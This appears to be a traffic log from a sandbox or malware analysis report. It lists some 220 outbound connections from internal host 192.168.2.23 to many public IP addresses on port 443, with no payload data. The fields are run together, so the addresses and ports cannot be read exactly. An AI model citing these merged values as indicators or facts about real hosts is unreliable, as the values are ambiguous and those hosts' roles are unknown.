                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22850192.168.2.2348984103.119.60.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22851192.168.2.2341704182.217.237.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22852192.168.2.2350894117.85.156.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22853192.168.2.2343518186.101.241.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22854192.168.2.2344690195.168.210.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22855192.168.2.2333146201.135.85.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22856192.168.2.2340896157.15.5.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22857192.168.2.235854871.87.246.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22858192.168.2.235474248.10.86.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22859192.168.2.235569214.177.149.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22860192.168.2.2358518131.121.120.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22861192.168.2.2334204168.61.101.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22862192.168.2.2342638175.67.206.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22863192.168.2.234113012.145.235.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22864192.168.2.2344104121.13.244.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22865192.168.2.2345238221.176.63.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22866192.168.2.234096817.238.230.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22867192.168.2.2350924198.240.7.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22868192.168.2.2335270211.163.179.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22869192.168.2.23441901.62.162.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22870192.168.2.234985620.88.97.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22871192.168.2.234814876.122.1.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22872192.168.2.2355674148.209.225.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22873192.168.2.233620844.252.140.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22874192.168.2.23448501.37.50.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22875192.168.2.234127041.3.50.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22876192.168.2.2339588106.123.226.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22877192.168.2.235450891.41.224.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22878192.168.2.2351754160.28.148.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22879192.168.2.2353288116.135.254.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22880192.168.2.2359772108.3.156.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22881192.168.2.2337184115.88.212.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22882192.168.2.2334472222.95.175.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22883192.168.2.2356322138.90.197.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22884192.168.2.2358838180.214.237.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22885192.168.2.2349878180.155.194.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22886192.168.2.2343524122.194.41.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22887192.168.2.233644095.140.161.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22888192.168.2.2353634133.21.127.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22889192.168.2.233824497.210.48.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22890192.168.2.234967285.190.100.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22891192.168.2.235547488.171.128.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22892192.168.2.234595479.158.177.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22893192.168.2.234796036.136.91.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22894192.168.2.2354016189.202.192.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22895192.168.2.2352700136.96.97.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22896192.168.2.235410288.122.251.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22897192.168.2.2348192109.114.61.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22898192.168.2.236003286.204.106.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22899192.168.2.2349220118.153.82.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22900192.168.2.2335280186.60.151.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22901192.168.2.235194458.30.172.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22902192.168.2.233459060.205.83.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22903192.168.2.233819491.181.46.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22904192.168.2.2345486114.65.200.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22905192.168.2.2349914191.73.37.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22906192.168.2.234395035.168.177.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22907192.168.2.234707480.202.101.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22908192.168.2.2358368208.133.233.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22909192.168.2.233612654.30.148.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22910192.168.2.233454472.112.150.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22911192.168.2.235368670.239.146.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22912192.168.2.2338748161.69.21.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22913192.168.2.235291235.124.169.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22914192.168.2.234765238.100.242.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22915192.168.2.2341612210.99.64.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22916192.168.2.235268893.178.152.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22917192.168.2.236037064.119.162.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22918192.168.2.2341898158.197.37.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22919192.168.2.234812878.105.218.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22920192.168.2.2343186138.168.204.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22921192.168.2.235871673.3.154.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22922192.168.2.2335476131.186.70.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22923192.168.2.2348702170.113.134.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22924192.168.2.2343436119.241.117.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22925192.168.2.2353606179.241.214.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22926192.168.2.2349110174.41.253.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22927192.168.2.2354692144.225.36.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22928192.168.2.2359266104.174.29.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22929192.168.2.2350178108.78.126.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22930192.168.2.2344700216.78.175.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22931192.168.2.2340762108.179.72.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22932192.168.2.2348102107.103.148.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22933192.168.2.2351956122.28.139.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22934192.168.2.2357240171.60.116.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22935192.168.2.235564267.27.93.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22936192.168.2.2337568114.118.149.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22937192.168.2.2334944176.133.64.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22938192.168.2.233338889.72.147.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22939192.168.2.234766672.60.16.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22940192.168.2.2355618112.0.92.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22941192.168.2.2346686130.241.143.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22942192.168.2.2345132144.196.57.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22943192.168.2.235776659.39.95.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22944192.168.2.233435888.151.19.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22945192.168.2.2347554149.67.233.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22946192.168.2.234446695.94.242.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22947192.168.2.235774840.242.3.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22948192.168.2.233309887.147.228.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22949192.168.2.233737613.216.11.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22950192.168.2.235974037.2.171.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22951192.168.2.2352850141.68.167.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22952192.168.2.2335980190.169.186.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22953192.168.2.2349582200.31.231.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22954192.168.2.235878837.140.236.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22955192.168.2.235098053.47.174.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22956192.168.2.2347332105.64.156.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22957192.168.2.2359972148.225.221.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22958192.168.2.234813257.125.41.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22959192.168.2.2355760100.235.62.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22960192.168.2.2359542118.147.241.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22961192.168.2.2360884173.205.170.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22962192.168.2.2355640177.24.129.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22963192.168.2.2355326205.72.243.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22964192.168.2.234585859.49.7.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22965192.168.2.235022432.14.17.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22966192.168.2.235817273.215.180.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22967192.168.2.235130417.183.69.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22968192.168.2.2340480147.162.195.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22969192.168.2.2359378162.76.48.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22970192.168.2.2354734158.173.168.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22971192.168.2.2339096110.14.165.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22972192.168.2.23335205.210.180.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22973192.168.2.235139278.135.67.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22974192.168.2.234753263.188.7.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22975192.168.2.233777283.37.95.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22976192.168.2.2351332183.235.135.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22977192.168.2.2352816148.138.252.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22978192.168.2.234285019.193.203.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22979192.168.2.234259669.231.199.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22980192.168.2.234250227.13.44.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22981192.168.2.2343054219.96.233.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22982192.168.2.2357972165.167.196.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22983192.168.2.2349890158.42.154.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22984192.168.2.2352806211.189.12.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22985192.168.2.235213420.44.175.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22986192.168.2.2345508152.70.54.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22987192.168.2.235512824.125.131.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22988192.168.2.2351724220.15.49.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22989192.168.2.2340500194.231.95.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22990192.168.2.234889698.72.44.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22991192.168.2.2351508125.159.179.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22992192.168.2.235732858.201.9.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22993192.168.2.234905837.68.151.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22994192.168.2.23432981.206.96.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22995192.168.2.235774898.41.223.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22996192.168.2.2337716121.50.156.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22997192.168.2.235953257.81.133.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22998192.168.2.235077465.150.61.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22999192.168.2.235037019.195.150.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23000192.168.2.2348652107.183.172.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23001192.168.2.2354578131.165.72.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23002192.168.2.235265254.178.133.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23003192.168.2.235979092.74.1.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23004192.168.2.2336954169.127.225.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23005192.168.2.234892460.168.57.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23006192.168.2.2337218132.27.144.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23007192.168.2.2336266208.131.118.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23008192.168.2.2349340219.50.195.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23009192.168.2.2353722186.35.32.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23010192.168.2.233709651.192.100.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23011192.168.2.234672682.7.94.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23012192.168.2.2335236186.5.189.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23013192.168.2.233577646.255.160.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23014192.168.2.234312466.245.222.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23015192.168.2.2359284177.36.112.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23016192.168.2.2345154173.103.86.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23017192.168.2.235137871.132.169.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23018192.168.2.2348972222.82.146.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23019192.168.2.2338372221.183.248.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23020192.168.2.2334970110.126.101.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23021192.168.2.2353898132.111.237.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23022192.168.2.2340638204.219.138.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23023192.168.2.2347696109.131.162.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23024192.168.2.2340346124.127.239.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23025192.168.2.2333930208.118.51.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23026192.168.2.2344024180.43.159.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23027192.168.2.234684619.205.209.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23028192.168.2.235524482.80.174.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23029192.168.2.2348688183.24.155.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23030192.168.2.234674641.50.38.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23031192.168.2.2358928213.25.127.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23032192.168.2.233490420.244.93.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23033192.168.2.2353538200.155.24.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23034192.168.2.234829088.16.97.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23035192.168.2.2333568222.50.204.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23036192.168.2.2360978197.92.220.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23037192.168.2.2355066205.27.161.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23038192.168.2.2355912148.13.106.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23039192.168.2.2350660211.70.251.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23040192.168.2.2359574124.96.40.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23041192.168.2.233969490.49.86.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23042192.168.2.2355458105.51.53.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23043192.168.2.234857834.198.29.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23044192.168.2.23327804.154.45.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23045192.168.2.2340734106.149.141.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23046192.168.2.2340646104.186.160.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23047192.168.2.234428431.118.147.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23048192.168.2.2360230137.229.244.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23049192.168.2.233516238.91.21.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23050192.168.2.2350242113.253.40.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23051192.168.2.2359292138.0.169.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23052192.168.2.2350956159.218.180.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23053192.168.2.2335576157.225.7.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23054192.168.2.234775071.72.7.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23055192.168.2.234599247.109.72.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23056192.168.2.2352580126.223.47.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23057192.168.2.235766653.233.97.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23058192.168.2.234868848.168.18.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23059192.168.2.234769857.95.164.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23060192.168.2.235487480.231.157.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23061192.168.2.233609684.245.92.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23062192.168.2.2353048155.236.68.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23063192.168.2.233864665.204.53.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23064192.168.2.2344554128.111.100.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23065192.168.2.2353538206.167.231.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23066192.168.2.23603224.77.214.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23067192.168.2.23502544.204.128.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23068192.168.2.235133272.131.35.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23069192.168.2.2340598200.242.35.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23070192.168.2.234139425.48.118.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23071192.168.2.2354476169.31.138.96443
                                          TimestampBytes transferredDirectionData


